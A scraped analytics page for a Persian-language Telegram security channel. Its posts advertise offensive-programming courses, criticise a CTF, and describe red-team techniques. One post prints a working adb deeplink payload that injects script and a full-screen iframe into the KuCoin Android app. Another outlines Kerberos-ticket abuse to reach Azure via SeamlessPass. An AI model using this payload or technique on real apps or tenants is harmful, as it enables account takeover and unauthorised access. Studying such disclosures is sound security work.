cookie

نحن نستخدم ملفات تعريف الارتباط لتحسين تجربة التصفح الخاصة بك. بالنقر على "قبول الكل"، أنت توافق على استخدام ملفات تعريف الارتباط.

avatar

Security Analysis

- Offensive Security (Red Teaming / PenTesting) - BlueTeam (OperationSec, TreatHunting, DFIR) - Reverse Engineering / Malware Analysis - Web Security - Cryptography - Steganography - Forensics

إظهار المزيد
مشاركات الإعلانات
12 111
المشتركون
+424 ساعات
+1207 أيام
+47830 أيام

جاري تحميل البيانات...

معدل نمو المشترك

جاري تحميل البيانات...

20:08
Video unavailableShow in Telegram
#Course #DWORD 🖥ویدیو معرفی دوره برنامه نویسی تهاجمی مختص به تیم های قرمز 📊بررسی کامل دوره، سرفصل ها و موضوعاتی که در هر فصل بیان خواهند شد. ⏰آخرین بروزرسانی سرفصل ها : 18 September 2024 🖥شهریه دوره ۱۵,۰۰۰,۰۰۰ تومان است که با ۲۰٪ تخفیف به ۱۰ نفر اول ارائه می‌شود. 📑همچنین، امکان پرداخت به صورت اقساط نیز فراهم است. 🖥نحوه شرکت در دوره : به دلیل ظرفیت محدود کلاس، اولویت ثبت‌نام با دانشجویانی است که آزمون تعیین سطح را گذرانده باشند. چنانچه پیش‌نیازهای لازم برای شرکت در دوره را ندارید، همچنان می‌توانید در دوره شرکت کنید، اما ابتدا باید این پیش‌نیازها را بگذرانید. جهت دریافت اطلاعات بیشتر به آیدی @YMahmoudnia پیغام بدین. 🦅 کانال بایت امن | گروه بایت امن _
إظهار الكل...
Offensive-Programming.mp448.18 MB
⭕️ عرض دوستانه خدمت برگزار کنندگان مسابقه ی CTF شاپرک CASH24 داشتیم. معمولا وقتی مسابقه ی امنیت سایبری برگزار میشه ، یا تیم فنی امنیت اون شرکت یا تیم مستقل حتی باشه، بر اساس تجربیات خودشون چالش طراحی میکنند و این مسابقه از دیدگاه امثال ما که سالهاست توی مسابقات هستیم سطح تخصصی و سواد فنی تیم امنیت اون شرکت رو نشون میده. شاپرک سطح تخصص تیم امنیتشون در همین حد بود که بیان چالشهای مسابقات قدیمی رو کپی و پیست کنند بدون هیچ گونه ایده ای و بدون هیچ تجربه ای همچین مسابقه ی بی کیفیتی رو برگزار کنند. گاها یک جایی میاد از تیم های باسابقه ی برگزاری مسابقه کمک میگیره که چالش طراحی کنند و در پشتیبانی مسابقه همیاری کنند ، اما شاپرک حتی از نظر اخلاقی انقدر بی تخصص و بی کیفیت و بی علم بودن که اخلاقشون در همین حد بود که حتی شاید غرور داشتن نخواستن از جایی کمک بگیرند واسه برگزاری مسابقه و این خودش نمره منفی دیگه ای هست در کارنامه ی شاپرک. امیدوارم این عزیزان که در Event برگزار شده دعوت شدند بخاطر علم و تخصصشون دعوت شده باشن نه بخاطر اینکه بلد باشن سرچ بزنند و Flag رو از رایت اپ های خارجی کپی پیست کنند تا رتبه خوب بیارن:) نمونه این پست طرف توی کمتر یک ساعت اومد رنک های برتر قرار گرفت در حدی که فکر کنم ping میگرفت و توی پاسخ Flag دریافت میکرد:) نوش جان ولی تمامی تیم هایی مثل ما که سالهاست توی مسابقه هستیم وقتی فهمیدیم شاپرک بلد نبوده مسابقه برگزار کنه و تخصص نداشتن که خودشون چالش امنیت طراحی کنند کنار کشیدیم و ادامه ندادیم. امیدوارم برای دفعات بعدی اگر خواستن مسابقه برگزار کنند وسط مسابقه چالش بدون فلگ نیارن و تیم هایی خاص یهویی بدون فلگ امتیاز براشون ثبت نشه که ما اینها رو با مدرک فنی ثبت کردیم که در کارنامه تیم ها هم موندگار خواهد شد. خلاصه که ایونت برگزار میکنید و دورهمی برای همدیگه نوشابه هم باز کنید چندتا خبرگزاری هم دعوت کنید بگید بودجه گرفتیم مسابقه کشوری برگزار کردیم و چندتا مدیر دولتی رو هم گول بزنید بگید خفنیم. باشه مرسی نوشابه بعدی لطفا. #CASH24 #شاپرک @securation
إظهار الكل...
Security Analysis

داداش یه کم صبر کن میدونیم امنیت کار نیستی ولی اوسینت بلدی :)) بخدا ما هم دست داریم هم سرچ زدن رو خوب بلدیم😂 #شاپرک #تقلب #HADES @securation

Photo unavailableShow in Telegram
داداش یه کم صبر کن میدونیم امنیت کار نیستی ولی اوسینت بلدی :)) بخدا ما هم دست داریم هم سرچ زدن رو خوب بلدیم😂 #شاپرک #تقلب #HADES @securation
إظهار الكل...
کسی از این عزیزان شاپرک اینجا هست یه پیام بده بهم؟ بابت این مسابقه Cash24 مسابقه ی CTF که برگزار میشه معلوم نیست از ساعت چند شروع میشه و پایانش کی هست، مشخص نیست جوایزش چیه ، مشخص نیست اصلا لینک اکسپایر شده ی دیسکورد فرستادن ایمیل ثبت نام کنندگان که جوین بدن گروه دیسکورد مسابقه و کلی اشتباه فنی و غیرفنی دیگه ، اگه کسی هست یک پیام بده به ما تا بدونیم چه خبره دقیقا و اطلاع رسانی بشه. @DarkPwn
إظهار الكل...
04:18
Video unavailableShow in Telegram
⭕️ اکسپلویت DeepLink و جاوا اسکریپت اینترفیس و بدست آوردن دسترسی غیرمجاز در اپ اندروید صرافی کوکوین در این حمله اتکر توانایی باز کردن پوزیشن ترید و همچنین بستن ترید های باز داخل اپ اندرویدی را تنها با کلیک کردن بر روی یک لینک بدست می آورد
adb shell am start   -d 'kucoin:///link?data=\<script\>document.write\(\"\<iframe src=https://www.example.com style=position:fixed;top:0;left:0;width:100%;height:100%;border:none;\>\<\/iframe\>\"\)\;\</script\>'
📎 BlogPost @Securation #Android
إظهار الكل...
9.29 MB
‏⭕️ اگر به ساختار Azure و ارتباط معماری های On-perm با آن رجوع کرده باشید، خواهید دانست که سرویس Seamless SSO با استفاده از تیکت های Kerberos Active Directory محلی اقدام به دسترسی Azure و سرویس 365 میکند. در ادامه این سرویس با استفاده از تیکت ارسال شده یک Computer Account به اسم AZUREADSSOACC با SPN های خاص ایجاد میکند، که در زمان Validate شدن با Entra ID server مورد استفاده قرار میگیرد. حال اگر با دیدگاه RedTeam به آن دقت کنیم متوجه چند مورد خواهیم شد:
در صورت نبود Credential به شکل Clear-text، ما به سه شکل میتوانیم با استفاده از این تکنیک و ابزار SeamlessPass به دسترسی برسیم: در حالت اول ما TGT یا KRBTGT را دارا هستیم که با Golden,Diamond,و ازین قبیل حملات، اقدام به تولید TGS میکنیم و ادامه ماجرا. در حالت دوم ما NTML Hash و یا AES key را دارا هستیم، که اقدام به دریافت TGT و TGS میکنیم و ادامه ماجرا. و در حالت سوم ما NTLM Hash و AES Key اکانت AZUREADSSOACC که پیش تر صحبت شد را دارا هستیم، که میتوان TGS تولید کند و بدون هیچ تعاملی با DC، در Azure احراز هویت کند.
در ادامه با دسترسی به محیط مربوطه با استفاده از ROADTools و AADInternals میتوان اقدام به Enumeration و Exploitation کرد. #RedTeam #Azure #Cloud @securation
إظهار الكل...
SeamlessPass: Leveraging Kerberos Tickets to Access the Cloud

Author: Abdulrahman Nour TL;DR We have created SeamlessPass, a tool that utilizes Microsoft’s Seamless SSO feature to acquire access tokens for Microsoft 365 services by leveraging on-premises Active Directory Kerberos tickets. SeamlessPass is particularly useful in red team scenarios where cleartext passwords are unavailable, but...

Photo unavailableShow in Telegram
#Course 🖥دوره برنامه نویسی تهاجمی مختص به تیم های قرمز دوره برنامه‌نویسی تهاجمی (Offensive Programming) یک دوره تخصصی و پیشرفته است که به برنامه‌نویسان و علاقه‌مندان به امنیت سایبری آموزش می‌دهد چگونه با استفاده از برنامه‌نویسی، سیستم‌های کامپیوتری را تست کرده و آسیب‌پذیری‌های آن‌ها را شناسایی کنند. در این دوره، شما با تکنیک‌های بهره‌برداری از نقاط ضعف نرم‌افزارها و سیستم‌ها آشنا می‌شوید و یاد می‌گیرید چگونه مکانیزم‌های امنیتی مانند آنتی‌ویروس‌ها و فایروال‌ها را دور بزنید. پروژه نهایی دوره : پیاده سازی در این دوره، ابتدا با اصول و ساختارهای پایه‌ای سرور C2 و نحوه عملکرد آن آشنا خواهید شد. سپس به طراحی و برنامه‌ریزی معماری سرور C2 پرداخته و پروتکل‌ها و ساختارهای ارتباطی مناسب را انتخاب خواهید کرد. بعد از آن، نرم‌افزارهای مورد نیاز برای پیاده‌سازی سرور C2 و ارتباط آن با سیستم‌های آلوده را خواهید ساخت. در ادامه، سرور C2 را تحت شرایط مختلف شبیه‌سازی و تست خواهید کرد تا عملکرد آن را ارزیابی و بهبود دهید. در نهایت، تکنیک‌های امنیتی را برای محافظت از سرور C2 و جلوگیری از شناسایی آن توسط ابزارهای امنیتی پیاده‌سازی خواهید کرد. 💠مشخصات دوره: 📃لینک سرفصل های دوره ⬅️شروع دوره: ۱۵ مهر ماه ⬅️سطح دوره: متوسط/پیشرفته ⬅️مدت زمان دوره: ۵۰ ساعت ⬅️نحوه برگزاری: آفلاین و آنلاین ⬅️مدت زمان دوره: ۲ ماه 🖥شهریه دوره ۱۵,۰۰۰,۰۰۰ تومان است که با ۲۰٪ تخفیف به ۱۰ نفر اول ارائه می‌شود. 📑همچنین، امکان پرداخت به صورت اقساط نیز فراهم است. 🖥نحوه شرکت در دوره : به دلیل ظرفیت محدود کلاس، اولویت ثبت‌نام با دانشجویانی است که آزمون تعیین سطح را گذرانده باشند. چنانچه پیش‌نیازهای لازم برای شرکت در دوره را ندارید، همچنان می‌توانید در دوره شرکت کنید، اما ابتدا باید این پیش‌نیازها را بگذرانید. جهت دریافت اطلاعات بیشتر به آیدی @YMahmoudnia پیغام بدین. 🦅 کانال بایت امن | گروه بایت امن _
إظهار الكل...
‏⭕️ ‏Pynt یک پلتفرم تست امنیتی API است که به توسعه‌دهندگان و تیم‌های امنیتی کمک می‌کند تا امنیت API ها را به صورت خودکار و در مراحل اولیه توسعه، ارزیابی و تضمین کنند. این پلتفرم به طور ویژه برای پوشش خلأ های امنیتی API طراحی شده و ویژگی‌های منحصربه‌فردی را برای این منظور ارائه می‌دهد. از ویژگی های آن: خودکارسازی تست‌های امنیتی API:
Pynt به ما این امکان را میدهد تا تست‌های امنیتی را به صورت خودکار بر روی API ها اجرا کنید. این تست‌ها بر اساس سناریوهای واقعی حمله مانند تزریق کد و حملات scraping اجرا می‌شوند و از این طریق به شناسایی و رفع آسیب‌پذیری‌ها قبل از تولید کمک می‌کنند.
‏Context-Aware Testing:
‏Pynt از تحلیل‌های مختلف برای درک بهتر کارکردهای خاص API ها و نحوه تعامل آن‌ها با فرآیندهای تجاری استفاده می‌کند. این قابلیت کمک می‌کند تا آسیب‌پذیری‌های خاصی که ممکن است در تست‌های استاندارد نادیده گرفته شوند، شناسایی شوند.
‏Zero False Positives:
‏یکی از مواردی که ادعا کرده این ابزار دقت بالای آن در تشخیص آسیب‌پذیری‌ها بدون ایجاد خطا است.
پشتیبانی از OWASP Top 10 و لیست‌های امنیتی دیگر:
با استفاده از استانداردهای OWASP و سایر استاندارد های امنیتی،اقدام به بررسی میکند.
ادغام با ابزارهای توسعه و CI/CD:
‏این پلتفرم به راحتی با ابزارهای محبوب توسعه API مانند Postman و BurpSuite و سیستم‌های CI/CD ادغام می‌شود، که به توسعه‌دهندگان امکان می‌دهد امنیت API ها را به‌صورت مستقیم در جریان توسعه بررسی کنند.
ارائه گزارش‌های کامل و Remediation Paths:
‏ گزارش‌های کاملی از آسیب‌پذیری‌ها همراه با پیشنهادات رفع مشکل و تیکت‌های خودکار ارائه می‌دهد که این فرآیند را برای تیم‌های امنیتی و توسعه‌دهندگان ساده‌تر می‌کند.
پشتیبانی از انواع مختلف API ها:
از انواع مختلف API ها شامل REST، SOAP، و GraphQL پشتیبانی می‌کند، و با توجه به نیازهای خاص هر نوع API، تست‌های مربوطه را انجام می‌دهد. در آخر میتوان در نسخه های trial و تجاری از آن استفاده کرد.
#AppSec #APISecurity @securation
إظهار الكل...
Pynt: Effortless API Security Testing

Pynt offers dynamic API security testing for developers and testers to identify and fix vulnerabilities during the development lifecycle.

Photo unavailableShow in Telegram
معرفی دوره های آموزشی آکادمی DWORD - ( دوره های آفلاین ) ▪️دوره آموزش مهندسی معکوس نرم افزار سطح مقدماتی - متوسط | دوره پنجم ▪️دوره آموزش زبان برنامه نویسی اسمبلی ویندوز | سطح مقدماتی - متوسط ▪️دوره آموزش برنامه نویسی سیستمی ویندوز | سطح پیشرفته ▪️دوره آموزش برنامه نویسی C ویندوز و لینوکس | سطح مقدماتی - متوسط 🖥 امکان ثبت نام در دوره ها به صورت اقساط و همچنین تخفیف 10% برای دانشجویان سابق آکادمی فراهم هست. تمامی دوره ها گروه پشتیبانی جهت پرسش و پاسخ دارند. 🦅 کانال بایت امن | گروه بایت امن _
إظهار الكل...
Repost from فوتبال ۳۶۰
منچستر قرمز است! 😱 وقتی توییتر امباپه هک می‌شود ‼️ بامداد امروز اکانت رسمی کیلین امباپه در توییتر هک شد و توییت‌های عجیبی با نام او منتشر شد! 💬 «منچستر قرمز است!» 💬 «سال ۲۰۲۸ در انتقالی رایگان به منچستریونایتد می‌روم.» 💬 «کریستیانو رونالدو بهترین بازیکن تاریخ فوتبال است. مسی اسطوره من نیست.» ✅ پس از ساعاتی اکانت توییتر ستاره رئال مادرید بازیابی شد و به حالت اولیه بازگشت. @Ft360_ir
إظهار الكل...
اختر خطة مختلفة

تسمح خطتك الحالية بتحليلات لما لا يزيد عن 5 قنوات. للحصول على المزيد، يُرجى اختيار خطة مختلفة.